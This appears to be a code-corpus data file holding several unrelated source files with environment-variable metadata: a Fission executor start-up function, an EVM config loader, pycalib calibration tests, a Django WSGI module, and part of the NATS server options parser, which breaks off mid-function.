// StartExecutor Starts executor and the executor components such as Poolmgr,
// deploymgr and potential future executor types
func StartExecutor(logger *zap.Logger, functionNamespace string, envBuilderNamespace string, port int) error {
fissionClient, kubernetesClient, _, err := crd.MakeFissionClient()
if err != nil {
return errors.Wrap(err, "failed to get kubernetes client")
}
err = fissionClient.WaitForCRDs()
if err != nil {
return errors.Wrap(err, "error waiting for CRDs")
}
fetcherConfig, err := fetcherConfig.MakeFetcherConfig("/userfunc")
if err != nil {
return errors.Wrap(err, "Error making fetcher config")
}
executorInstanceID := strings.ToLower(uniuri.NewLen(8))
logger.Info("Starting executor", zap.String("instanceID", executorInstanceID))
gpm := poolmgr.MakeGenericPoolManager(
logger,
fissionClient, kubernetesClient,
functionNamespace, fetcherConfig, executorInstanceID)
ndm := newdeploy.MakeNewDeploy(
logger,
fissionClient, kubernetesClient, fissionClient.CoreV1().RESTClient(),
functionNamespace, fetcherConfig, executorInstanceID)
executorTypes := make(map[fv1.ExecutorType]executortype.ExecutorType)
executorTypes[gpm.GetTypeName()] = gpm
executorTypes[ndm.GetTypeName()] = ndm
adoptExistingResources, _ := strconv.ParseBool(os.Getenv("ADOPT_EXISTING_RESOURCES"))
wg := &sync.WaitGroup{}
for _, et := range executorTypes {
wg.Add(1)
go func(et executortype.ExecutorType) {
defer wg.Done()
if adoptExistingResources {
et.AdoptExistingResources()
}
et.CleanupOldExecutorObjects()
}(et)
}
// set hard timeout for resource adoption
// TODO: use context to control the waiting time once kubernetes client supports it.
util.WaitTimeout(wg, 30*time.Second)
cms := cms.MakeConfigSecretController(logger, fissionClient, kubernetesClient, executorTypes)
api, err := MakeExecutor(logger, cms, fissionClient, executorTypes)
if err != nil {
return err
}
go reaper.CleanupRoleBindings(logger, kubernetesClient, fissionClient, functionNamespace, envBuilderNamespace, time.Minute*30)
go api.Serve(port)
go serveMetric(logger)
return nil
}
|
[
"\"ADOPT_EXISTING_RESOURCES\""
] |
[] |
[
"ADOPT_EXISTING_RESOURCES"
] |
[]
|
["ADOPT_EXISTING_RESOURCES"]
|
go
| 1 | 0 | |
manager/config.go
|
package manager
import (
"bytes"
"context"
"encoding/json"
"errors"
"fmt"
"io"
"io/fs"
"os"
"path/filepath"
"strings"
"github.com/sethvargo/go-envconfig"
"gopkg.in/yaml.v3"
)
var ErrConfig = fmt.Errorf("%w", Err)
type Mode string
const (
User Mode = "user"
System Mode = "system"
)
type ConfigFile struct {
Paths ConfigFilePaths `yaml:"paths" json:"paths"`
}
type ConfigFilePaths struct {
Shims string `yaml:"shims" json:"shims" env:"EVM_SHIMS,overwrite"`
Sources string `yaml:"sources" json:"sources" env:"EVM_SOURCES,overwrite"`
Versions string `yaml:"versions" json:"versions" env:"EVM_VERSIONS,overwrite"`
}
type Config struct {
Mode Mode `yaml:"mode" json:"mode"`
Current CurrentConfig `yaml:"current" json:"current"`
Paths PathsConfig `yaml:"paths" json:"paths"`
}
type CurrentConfig struct {
Version string `yaml:"version" json:"version"`
SetBy string `yaml:"set_by,omitempty" json:"set_by,omitempty"`
}
type PathsConfig struct {
Binary string `yaml:"binary" json:"binary"`
Root string `yaml:"root" json:"root"`
Shims string `yaml:"shims" json:"shims"`
Sources string `yaml:"sources" json:"sources"`
Versions string `yaml:"versions" json:"versions"`
}
func NewConfig() (*Config, error) {
mode := Mode(os.Getenv("EVM_MODE"))
if mode != System {
mode = User
}
defaultRoot := filepath.Join(string(os.PathSeparator), "opt", "evm")
if mode == User {
defaultRoot = filepath.Join("$HOME", ".evm")
}
if v := os.Getenv("EVM_ROOT"); v != "" {
defaultRoot = v
}
conf := &Config{
Mode: mode,
Paths: PathsConfig{
Root: defaultRoot,
Shims: "$EVM_ROOT/shims",
Sources: "$EVM_ROOT/sources",
Versions: "$EVM_ROOT/versions",
},
}
var err error
conf.Paths.Root, err = conf.normalizePath(conf.Paths.Root)
if err != nil {
return nil, err
}
err = conf.load()
if err != nil {
return nil, err
}
conf.Paths.Shims, err = conf.normalizePath(conf.Paths.Shims)
if err != nil {
return nil, err
}
conf.Paths.Sources, err = conf.normalizePath(conf.Paths.Sources)
if err != nil {
return nil, err
}
conf.Paths.Versions, err = conf.normalizePath(conf.Paths.Versions)
if err != nil {
return nil, err
}
conf.Paths.Binary, err = os.Executable()
if err != nil {
return nil, err
}
err = conf.PopulateCurrent()
if err != nil {
return nil, err
}
return conf, nil
}
const currentFileName = "current"
func (conf *Config) PopulateCurrent() error {
if v := os.Getenv("EVM_VERSION"); v != "" {
conf.Current.Version = strings.TrimSpace(v)
conf.Current.SetBy = "EVM_VERSION environment variable"
return nil
}
currentFile := filepath.Join(conf.Paths.Root, currentFileName)
b, err := os.ReadFile(currentFile)
if err != nil {
if errors.Is(err, fs.ErrNotExist) {
return nil
}
return err
}
if len(b) > 0 {
conf.Current.Version = strings.TrimSpace(string(b))
conf.Current.SetBy = currentFile
}
return nil
}
var configFileNames = []string{
"config.yaml",
"config.yml",
"config.json",
"evm.yaml",
"evm.yml",
"evm.json",
}
func (c *Config) load() error {
var path string
for _, name := range configFileNames {
f := filepath.Join(c.Paths.Root, name)
_, err := os.Stat(f)
if err != nil {
if errors.Is(err, fs.ErrNotExist) {
continue
}
return err
}
path = f
break
}
cf := &ConfigFile{}
if path != "" {
var err error
cf, err = c.loadConfigFile(path)
if err != nil {
return err
}
}
err := envconfig.Process(context.Background(), cf)
if err != nil {
return err
}
if cf.Paths.Shims != "" {
c.Paths.Shims = cf.Paths.Shims
}
if cf.Paths.Sources != "" {
c.Paths.Sources = cf.Paths.Sources
}
if cf.Paths.Versions != "" {
c.Paths.Versions = cf.Paths.Versions
}
return nil
}
func (c *Config) loadConfigFile(path string) (*ConfigFile, error) {
if path == "" {
return nil, nil
}
content, err := os.ReadFile(path)
if err != nil {
return nil, err
}
cf := &ConfigFile{}
buf := bytes.NewBuffer(content)
switch filepath.Ext(path) {
case ".yaml", ".yml":
dec := yaml.NewDecoder(buf)
dec.KnownFields(true)
err = dec.Decode(cf)
case ".json":
dec := json.NewDecoder(buf)
dec.DisallowUnknownFields()
err = dec.Decode(cf)
default:
return nil, fmt.Errorf(
`%w"%s" does not have a ".yaml", ".yml", `+
`or ".json" file extension`,
ErrConfig, path,
)
}
if err != nil && !errors.Is(err, io.EOF) {
return nil, err
}
return cf, nil
}
func (c *Config) normalizePath(path string) (string, error) {
path = strings.TrimSpace(path)
var homePrefix string
switch {
case strings.HasPrefix(path, "$HOME") ||
strings.HasPrefix(path, "$home"):
homePrefix = path[0:5]
case strings.HasPrefix(path, "~"):
homePrefix = path[0:1]
}
if homePrefix != "" {
if c.Mode == System {
return "", fmt.Errorf(
`%wEVM_MODE is set to "%s" which prohibits `+
`using "$HOME" or "~" in EVM_ROOT`,
ErrConfig, string(System),
)
}
var home string
home, err := os.UserHomeDir()
if err != nil {
return "", err
}
path = filepath.Join(
home, strings.TrimPrefix(path, homePrefix))
}
if c.Paths.Root == "" {
return path, nil
}
if strings.HasPrefix(path, "$EVM_ROOT") {
path = filepath.Join(c.Paths.Root, path[9:])
} else if !filepath.IsAbs(path) {
path = filepath.Join(c.Paths.Root, path)
}
return path, nil
}
|
[
"\"EVM_MODE\"",
"\"EVM_ROOT\"",
"\"EVM_VERSION\""
] |
[] |
[
"EVM_ROOT",
"EVM_MODE",
"EVM_VERSION"
] |
[]
|
["EVM_ROOT", "EVM_MODE", "EVM_VERSION"]
|
go
| 3 | 0 | |
pycalib/tests/models/test_init.py
|
import unittest
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.datasets import make_blobs
from pycalib.models import (IsotonicCalibration, LogisticCalibration,
BinningCalibration, SigmoidCalibration,
CalibratedModel)
from numpy.testing import assert_array_equal
class TestIsotonicCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = IsotonicCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestLogisticCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = LogisticCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestBinningCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = BinningCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestSigmoidCalibration(unittest.TestCase):
def test_fit_predict(self):
S = np.array([[0.1, 0.9], [0.6, 0.4]])
Y = np.array([1, 0])
cal = SigmoidCalibration()
cal.fit(S, Y)
pred = cal.predict(S)
assert_array_equal(Y, pred)
class TestCalibratedModel(unittest.TestCase):
def test_fit_predict(self):
X, Y = make_blobs(n_samples=10000, centers=5, n_features=2,
random_state=42)
Y = (Y > 2).astype(int)
cal = CalibratedModel(LogisticRegression(), IsotonicCalibration())
cal.fit(X, Y)
pred = cal.predict(X)
self.assertGreater(np.mean(Y == pred), 0.7)
def main():
unittest.main()
if __name__ == '__main__':
main()
|
[] |
[] |
[] |
[]
|
[]
|
python
| null | null | null |
soil/wsgi.py
|
"""
WSGI config for soil project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'soil.settings')
application = get_wsgi_application()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
server/opts.go
|
// Copyright 2012-2020 The NATS Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package server
import (
"context"
"crypto/tls"
"crypto/x509"
"errors"
"flag"
"fmt"
"io/ioutil"
"net"
"net/url"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"sync/atomic"
"time"
"github.com/nats-io/jwt/v2"
"github.com/nats-io/nkeys"
"github.com/nats-io/nats-server/v2/conf"
)
var allowUnknownTopLevelField = int32(0)
// NoErrOnUnknownFields can be used to change the behavior the processing
// of a configuration file. By default, an error is reported if unknown
// fields are found. If `noError` is set to true, no error will be reported
// if top-level unknown fields are found.
func NoErrOnUnknownFields(noError bool) {
var val int32
if noError {
val = int32(1)
}
atomic.StoreInt32(&allowUnknownTopLevelField, val)
}
// ClusterOpts are options for clusters.
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type ClusterOpts struct {
Name string `json:"-"`
Host string `json:"addr,omitempty"`
Port int `json:"cluster_port,omitempty"`
Username string `json:"-"`
Password string `json:"-"`
AuthTimeout float64 `json:"auth_timeout,omitempty"`
Permissions *RoutePermissions `json:"-"`
TLSTimeout float64 `json:"-"`
TLSConfig *tls.Config `json:"-"`
TLSMap bool `json:"-"`
TLSCheckKnownURLs bool `json:"-"`
ListenStr string `json:"-"`
Advertise string `json:"-"`
NoAdvertise bool `json:"-"`
ConnectRetries int `json:"-"`
// Not exported (used in tests)
resolver netResolver
}
// GatewayOpts are options for gateways.
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type GatewayOpts struct {
Name string `json:"name"`
Host string `json:"addr,omitempty"`
Port int `json:"port,omitempty"`
Username string `json:"-"`
Password string `json:"-"`
AuthTimeout float64 `json:"auth_timeout,omitempty"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
TLSMap bool `json:"-"`
TLSCheckKnownURLs bool `json:"-"`
Advertise string `json:"advertise,omitempty"`
ConnectRetries int `json:"connect_retries,omitempty"`
Gateways []*RemoteGatewayOpts `json:"gateways,omitempty"`
RejectUnknown bool `json:"reject_unknown,omitempty"` // config got renamed to reject_unknown_cluster
// Not exported, for tests.
resolver netResolver
sendQSubsBufSize int
}
// RemoteGatewayOpts are options for connecting to a remote gateway
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type RemoteGatewayOpts struct {
Name string `json:"name"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
URLs []*url.URL `json:"urls,omitempty"`
}
// LeafNodeOpts are options for a given server to accept leaf node connections and/or connect to a remote cluster.
type LeafNodeOpts struct {
Host string `json:"addr,omitempty"`
Port int `json:"port,omitempty"`
Username string `json:"-"`
Password string `json:"-"`
Account string `json:"-"`
Users []*User `json:"-"`
AuthTimeout float64 `json:"auth_timeout,omitempty"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
TLSMap bool `json:"-"`
Advertise string `json:"-"`
NoAdvertise bool `json:"-"`
ReconnectInterval time.Duration `json:"-"`
// For solicited connections to other clusters/superclusters.
Remotes []*RemoteLeafOpts `json:"remotes,omitempty"`
// Not exported, for tests.
resolver netResolver
dialTimeout time.Duration
connDelay time.Duration
}
// RemoteLeafOpts are options for connecting to a remote server as a leaf node.
type RemoteLeafOpts struct {
LocalAccount string `json:"local_account,omitempty"`
URLs []*url.URL `json:"urls,omitempty"`
Credentials string `json:"-"`
TLS bool `json:"-"`
TLSConfig *tls.Config `json:"-"`
TLSTimeout float64 `json:"tls_timeout,omitempty"`
Hub bool `json:"hub,omitempty"`
DenyImports []string `json:"-"`
DenyExports []string `json:"-"`
}
// Options block for nats-server.
// NOTE: This structure is no longer used for monitoring endpoints
// and json tags are deprecated and may be removed in the future.
type Options struct {
ConfigFile string `json:"-"`
ServerName string `json:"server_name"`
Host string `json:"addr"`
Port int `json:"port"`
ClientAdvertise string `json:"-"`
Trace bool `json:"-"`
Debug bool `json:"-"`
TraceVerbose bool `json:"-"`
NoLog bool `json:"-"`
NoSigs bool `json:"-"`
NoSublistCache bool `json:"-"`
NoHeaderSupport bool `json:"-"`
DisableShortFirstPing bool `json:"-"`
Logtime bool `json:"-"`
MaxConn int `json:"max_connections"`
MaxSubs int `json:"max_subscriptions,omitempty"`
Nkeys []*NkeyUser `json:"-"`
Users []*User `json:"-"`
Accounts []*Account `json:"-"`
NoAuthUser string `json:"-"`
SystemAccount string `json:"-"`
NoSystemAccount bool `json:"-"`
AllowNewAccounts bool `json:"-"`
Username string `json:"-"`
Password string `json:"-"`
Authorization string `json:"-"`
PingInterval time.Duration `json:"ping_interval"`
MaxPingsOut int `json:"ping_max"`
HTTPHost string `json:"http_host"`
HTTPPort int `json:"http_port"`
HTTPBasePath string `json:"http_base_path"`
HTTPSPort int `json:"https_port"`
AuthTimeout float64 `json:"auth_timeout"`
MaxControlLine int32 `json:"max_control_line"`
MaxPayload int32 `json:"max_payload"`
MaxPending int64 `json:"max_pending"`
Cluster ClusterOpts `json:"cluster,omitempty"`
Gateway GatewayOpts `json:"gateway,omitempty"`
LeafNode LeafNodeOpts `json:"leaf,omitempty"`
JetStream bool `json:"jetstream"`
JetStreamMaxMemory int64 `json:"-"`
JetStreamMaxStore int64 `json:"-"`
StoreDir string `json:"-"`
Websocket WebsocketOpts `json:"-"`
MQTT MQTTOpts `json:"-"`
ProfPort int `json:"-"`
PidFile string `json:"-"`
PortsFileDir string `json:"-"`
LogFile string `json:"-"`
LogSizeLimit int64 `json:"-"`
Syslog bool `json:"-"`
RemoteSyslog string `json:"-"`
Routes []*url.URL `json:"-"`
RoutesStr string `json:"-"`
TLSTimeout float64 `json:"tls_timeout"`
TLS bool `json:"-"`
TLSVerify bool `json:"-"`
TLSMap bool `json:"-"`
TLSCert string `json:"-"`
TLSKey string `json:"-"`
TLSCaCert string `json:"-"`
TLSConfig *tls.Config `json:"-"`
AllowNonTLS bool `json:"-"`
WriteDeadline time.Duration `json:"-"`
MaxClosedClients int `json:"-"`
LameDuckDuration time.Duration `json:"-"`
LameDuckGracePeriod time.Duration `json:"-"`
// MaxTracedMsgLen is the maximum printable length for traced messages.
MaxTracedMsgLen int `json:"-"`
// Operating a trusted NATS server
TrustedKeys []string `json:"-"`
TrustedOperators []*jwt.OperatorClaims `json:"-"`
AccountResolver AccountResolver `json:"-"`
AccountResolverTLSConfig *tls.Config `json:"-"`
resolverPreloads map[string]string
CustomClientAuthentication Authentication `json:"-"`
CustomRouterAuthentication Authentication `json:"-"`
// CheckConfig configuration file syntax test was successful and exit.
CheckConfig bool `json:"-"`
// ConnectErrorReports specifies the number of failed attempts
// at which point server should report the failure of an initial
// connection to a route, gateway or leaf node.
// See DEFAULT_CONNECT_ERROR_REPORTS for default value.
ConnectErrorReports int
// ReconnectErrorReports is similar to ConnectErrorReports except
// that this applies to reconnect events.
ReconnectErrorReports int
// private fields, used to know if bool options are explicitly
// defined in config and/or command line params.
inConfig map[string]bool
inCmdLine map[string]bool
// private fields, used for testing
gatewaysSolicitDelay time.Duration
routeProto int
}
// WebsocketOpts are options for websocket
type WebsocketOpts struct {
// The server will accept websocket client connections on this hostname/IP.
Host string
// The server will accept websocket client connections on this port.
Port int
// The host:port to advertise to websocket clients in the cluster.
Advertise string
// If no user name is provided when a client connects, will default to the
// matching user from the global list of users in `Options.Users`.
NoAuthUser string
// Name of the cookie, which if present in WebSocket upgrade headers,
// will be treated as JWT during CONNECT phase as long as
// "jwt" specified in the CONNECT options is missing or empty.
JWTCookie string
// Authentication section. If anything is configured in this section,
// it will override the authorization configuration of regular clients.
Username string
Password string
Token string
// Timeout for the authentication process.
AuthTimeout float64
// By default the server will enforce the use of TLS. If no TLS configuration
// is provided, you need to explicitly set NoTLS to true to allow the server
// to start without TLS configuration. Note that if a TLS configuration is
// present, this boolean is ignored and the server will run the Websocket
// server with that TLS configuration.
// Running without TLS is less secure since Websocket clients that use bearer
// tokens will send them in clear. So this should not be used in production.
NoTLS bool
// TLS configuration is required.
TLSConfig *tls.Config
// If true, map certificate values for authentication purposes.
TLSMap bool
// If true, the Origin header must match the request's host.
SameOrigin bool
// Only origins in this list will be accepted. If empty and
// SameOrigin is false, any origin is accepted.
AllowedOrigins []string
// If set to true, the server will negotiate with clients
// if compression can be used. If this is false, no compression
// will be used (both in server and clients) since it has to
// be negotiated between both endpoints
Compression bool
// Total time allowed for the server to read the client request
// and write the response back to the client. This include the
// time needed for the TLS Handshake.
HandshakeTimeout time.Duration
}
// MQTTOpts are options for MQTT
type MQTTOpts struct {
// The server will accept MQTT client connections on this hostname/IP.
Host string
// The server will accept MQTT client connections on this port.
Port int
// If no user name is provided when a client connects, will default to the
// matching user from the global list of users in `Options.Users`.
NoAuthUser string
// Authentication section. If anything is configured in this section,
// it will override the authorization configuration of regular clients.
Username string
Password string
Token string
// Timeout for the authentication process.
AuthTimeout float64
// TLS configuration is required.
TLSConfig *tls.Config
// If true, map certificate values for authentication purposes.
TLSMap bool
// Timeout for the TLS handshake
TLSTimeout float64
// AckWait is the amount of time after which a QoS 1 message sent to
// a client is redelivered as a DUPLICATE if the server has not
// received the PUBACK on the original Packet Identifier.
// The value has to be positive.
// Zero will cause the server to use the default value (1 hour).
// Note that changes to this option is applied only to new MQTT subscriptions.
AckWait time.Duration
// MaxAckPending is the amount of QoS 1 messages the server can send to
// a session without receiving any PUBACK for those messages.
// The valid range is [0..65535].
// Zero will cause the server to use the default value (1024).
// Note that changes to this option is applied only to new MQTT sessions.
MaxAckPending uint16
}
type netResolver interface {
LookupHost(ctx context.Context, host string) ([]string, error)
}
// Clone performs a deep copy of the Options struct, returning a new clone
// with all values copied.
func (o *Options) Clone() *Options {
if o == nil {
return nil
}
clone := &Options{}
*clone = *o
if o.Users != nil {
clone.Users = make([]*User, len(o.Users))
for i, user := range o.Users {
clone.Users[i] = user.clone()
}
}
if o.Nkeys != nil {
clone.Nkeys = make([]*NkeyUser, len(o.Nkeys))
for i, nkey := range o.Nkeys {
clone.Nkeys[i] = nkey.clone()
}
}
if o.Routes != nil {
clone.Routes = deepCopyURLs(o.Routes)
}
if o.TLSConfig != nil {
clone.TLSConfig = o.TLSConfig.Clone()
}
if o.Cluster.TLSConfig != nil {
clone.Cluster.TLSConfig = o.Cluster.TLSConfig.Clone()
}
if o.Gateway.TLSConfig != nil {
clone.Gateway.TLSConfig = o.Gateway.TLSConfig.Clone()
}
if len(o.Gateway.Gateways) > 0 {
clone.Gateway.Gateways = make([]*RemoteGatewayOpts, len(o.Gateway.Gateways))
for i, g := range o.Gateway.Gateways {
clone.Gateway.Gateways[i] = g.clone()
}
}
// FIXME(dlc) - clone leaf node stuff.
return clone
}
func deepCopyURLs(urls []*url.URL) []*url.URL {
if urls == nil {
return nil
}
curls := make([]*url.URL, len(urls))
for i, u := range urls {
cu := &url.URL{}
*cu = *u
curls[i] = cu
}
return curls
}
// Configuration file authorization section.
type authorization struct {
// Singles
user string
pass string
token string
acc string
// Multiple Nkeys/Users
nkeys []*NkeyUser
users []*User
timeout float64
defaultPermissions *Permissions
}
// TLSConfigOpts holds the parsed tls config information,
// used with flag parsing
type TLSConfigOpts struct {
CertFile string
KeyFile string
CaFile string
Verify bool
Insecure bool
Map bool
TLSCheckKnownURLs bool
Timeout float64
Ciphers []uint16
CurvePreferences []tls.CurveID
}
var tlsUsage = `
TLS configuration is specified in the tls section of a configuration file:
e.g.
tls {
cert_file: "./certs/server-cert.pem"
key_file: "./certs/server-key.pem"
ca_file: "./certs/ca.pem"
verify: true
verify_and_map: true
cipher_suites: [
"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
]
curve_preferences: [
"CurveP256",
"CurveP384",
"CurveP521"
]
}
Available cipher suites include:
`
// ProcessConfigFile processes a configuration file.
// FIXME(dlc): A bit hacky
func ProcessConfigFile(configFile string) (*Options, error) {
opts := &Options{}
if err := opts.ProcessConfigFile(configFile); err != nil {
// If only warnings then continue and return the options.
if cerr, ok := err.(*processConfigErr); ok && len(cerr.Errors()) == 0 {
return opts, nil
}
return nil, err
}
return opts, nil
}
// token is an item parsed from the configuration.
type token interface {
Value() interface{}
Line() int
IsUsedVariable() bool
SourceFile() string
Position() int
}
// unwrapValue can be used to get the token and value from an item
// to be able to report the line number in case of an incorrect
// configuration.
// also stores the token in lastToken for use in convertPanicToError
func unwrapValue(v interface{}, lastToken *token) (token, interface{}) {
switch tk := v.(type) {
case token:
if lastToken != nil {
*lastToken = tk
}
return tk, tk.Value()
default:
return nil, v
}
}
// use in defer to recover from panic and turn it into an error associated with last token
func convertPanicToErrorList(lastToken *token, errors *[]error) {
// only recover if an error can be stored
if errors == nil {
return
} else if err := recover(); err == nil {
return
} else if lastToken != nil && *lastToken != nil {
*errors = append(*errors, &configErr{*lastToken, fmt.Sprint(err)})
} else {
*errors = append(*errors, fmt.Errorf("encountered panic without a token %v", err))
}
}
// use in defer to recover from panic and turn it into an error associated with last token
func convertPanicToError(lastToken *token, e *error) {
// only recover if an error can be stored
if e == nil || *e != nil {
return
} else if err := recover(); err == nil {
return
} else if lastToken != nil && *lastToken != nil {
*e = &configErr{*lastToken, fmt.Sprint(err)}
} else {
*e = fmt.Errorf("%v", err)
}
}
// configureSystemAccount configures a system account
// if present in the configuration.
func configureSystemAccount(o *Options, m map[string]interface{}) (retErr error) {
var lt token
defer convertPanicToError(<, &retErr)
configure := func(v interface{}) error {
tk, v := unwrapValue(v, <)
sa, ok := v.(string)
if !ok {
return &configErr{tk, "system account name must be a string"}
}
o.SystemAccount = sa
return nil
}
if v, ok := m["system_account"]; ok {
return configure(v)
} else if v, ok := m["system"]; ok {
return configure(v)
}
return nil
}
// ProcessConfigFile updates the Options structure with options
// present in the given configuration file.
// This version is convenient if one wants to set some default
// options and then override them with what is in the config file.
// For instance, this version allows you to do something such as:
//
// opts := &Options{Debug: true}
// opts.ProcessConfigFile(myConfigFile)
//
// If the config file contains "debug: false", after this call,
// opts.Debug would really be false. It would be impossible to
// achieve that with the non receiver ProcessConfigFile() version,
// since one would not know after the call if "debug" was not present
// or was present but set to false.
func (o *Options) ProcessConfigFile(configFile string) error {
o.ConfigFile = configFile
if configFile == "" {
return nil
}
m, err := conf.ParseFileWithChecks(configFile)
if err != nil {
return err
}
// Collect all errors and warnings and report them all together.
errors := make([]error, 0)
warnings := make([]error, 0)
// First check whether a system account has been defined,
// as that is a condition for other features to be enabled.
if err := configureSystemAccount(o, m); err != nil {
errors = append(errors, err)
}
for k, v := range m {
o.processConfigFileLine(k, v, &errors, &warnings)
}
if len(errors) > 0 || len(warnings) > 0 {
return &processConfigErr{
errors: errors,
warnings: warnings,
}
}
return nil
}
func (o *Options) processConfigFileLine(k string, v interface{}, errors *[]error, warnings *[]error) {
var lt token
defer convertPanicToErrorList(<, errors)
tk, v := unwrapValue(v, <)
switch strings.ToLower(k) {
case "listen":
hp, err := parseListen(v)
if err != nil {
*errors = append(*errors, &configErr{tk, err.Error()})
return
}
o.Host = hp.host
o.Port = hp.port
case "client_advertise":
o.ClientAdvertise = v.(string)
case "port":
o.Port = int(v.(int64))
case "server_name":
o.ServerName = v.(string)
case "host", "net":
o.Host = v.(string)
case "debug":
o.Debug = v.(bool)
trackExplicitVal(o, &o.inConfig, "Debug", o.Debug)
case "trace":
o.Trace = v.(bool)
trackExplicitVal(o, &o.inConfig, "Trace", o.Trace)
case "trace_verbose":
o.TraceVerbose = v.(bool)
o.Trace = v.(bool)
trackExplicitVal(o, &o.inConfig, "TraceVerbose", o.TraceVerbose)
trackExplicitVal(o, &o.inConfig, "Trace", o.Trace)
case "logtime":
o.Logtime = v.(bool)
trackExplicitVal(o, &o.inConfig, "Logtime", o.Logtime)
case "mappings", "maps":
gacc := NewAccount(globalAccountName)
o.Accounts = append(o.Accounts, gacc)
err := parseAccountMappings(tk, gacc, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "disable_sublist_cache", "no_sublist_cache":
o.NoSublistCache = v.(bool)
case "accounts":
err := parseAccounts(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "authorization":
auth, err := parseAuthorization(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
o.Username = auth.user
o.Password = auth.pass
o.Authorization = auth.token
if (auth.user != "" || auth.pass != "") && auth.token != "" {
err := &configErr{tk, "Cannot have a user/pass and token"}
*errors = append(*errors, err)
return
}
o.AuthTimeout = auth.timeout
// Check for multiple users defined
if auth.users != nil {
if auth.user != "" {
err := &configErr{tk, "Can not have a single user/pass and a users array"}
*errors = append(*errors, err)
return
}
if auth.token != "" {
err := &configErr{tk, "Can not have a token and a users array"}
*errors = append(*errors, err)
return
}
// Users may have been added from Accounts parsing, so do an append here
o.Users = append(o.Users, auth.users...)
}
// Check for nkeys
if auth.nkeys != nil {
// NKeys may have been added from Accounts parsing, so do an append here
o.Nkeys = append(o.Nkeys, auth.nkeys...)
}
case "http":
hp, err := parseListen(v)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
o.HTTPHost = hp.host
o.HTTPPort = hp.port
case "https":
hp, err := parseListen(v)
if err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
o.HTTPHost = hp.host
o.HTTPSPort = hp.port
case "http_port", "monitor_port":
o.HTTPPort = int(v.(int64))
case "https_port":
o.HTTPSPort = int(v.(int64))
case "http_base_path":
o.HTTPBasePath = v.(string)
case "cluster":
err := parseCluster(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "gateway":
if err := parseGateway(tk, o, errors, warnings); err != nil {
*errors = append(*errors, err)
return
}
case "leaf", "leafnodes":
err := parseLeafNodes(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "jetstream":
err := parseJetStream(tk, o, errors, warnings)
if err != nil {
*errors = append(*errors, err)
return
}
case "logfile", "log_file":
o.LogFile = v.(string)
case "logfile_size_limit", "log_size_limit":
o.LogSizeLimit = v.(int64)
case "syslog":
o.Syslog = v.(bool)
trackExplicitVal(o, &o.inConfig, "Syslog", o.Syslog)
case "remote_syslog":
o.RemoteSyslog = v.(string)
case "pidfile", "pid_file":
o.PidFile = v.(string)
case "ports_file_dir":
o.PortsFileDir = v.(string)
case "prof_port":
o.ProfPort = int(v.(int64))
case "max_control_line":
if v.(int64) > 1<<31-1 {
err := &configErr{tk, fmt.Sprintf("%s value is too big", k)}
*errors = append(*errors, err)
return
}
o.MaxControlLine = int32(v.(int64))
case "max_payload":
if v.(int64) > 1<<31-1 {
err := &configErr{tk, fmt.Sprintf("%s value is too big", k)}
*errors = append(*errors, err)
return
}
o.MaxPayload = int32(v.(int64))
case "max_pending":
o.MaxPending = v.(int64)
case "max_connections", "max_conn":
o.MaxConn = int(v.(int64))
case "max_traced_msg_len":
o.MaxTracedMsgLen = int(v.(int64))
case "max_subscriptions", "max_subs":
o.MaxSubs = int(v.(int64))
case "ping_interval":
o.PingInterval = parseDuration("ping_interval", tk, v, errors, warnings)
case "ping_max":
o.MaxPingsOut = int(v.(int64))
case "tls":
tc, err := parseTLS(tk, true)
if err != nil {
*errors = append(*errors, err)
return
}
if o.TLSConfig, err = GenTLSConfig(tc); err != nil {
err := &configErr{tk, err.Error()}
*errors = append(*errors, err)
return
}
o.TLSTimeout = tc.Timeout
o.TLSMap = tc.Map
case "allow_non_tls":
o.AllowNonTLS = v.(bool)
case "write_deadline":
o.WriteDeadline = parseDuration("write_deadline", tk, v, errors, warnings)
case "lame_duck_duration":
dur, err := time.ParseDuration(v.(string))
if err != nil {
err := &configErr{tk, fmt.Sprintf("error parsing lame_duck_duration: %v", err)}
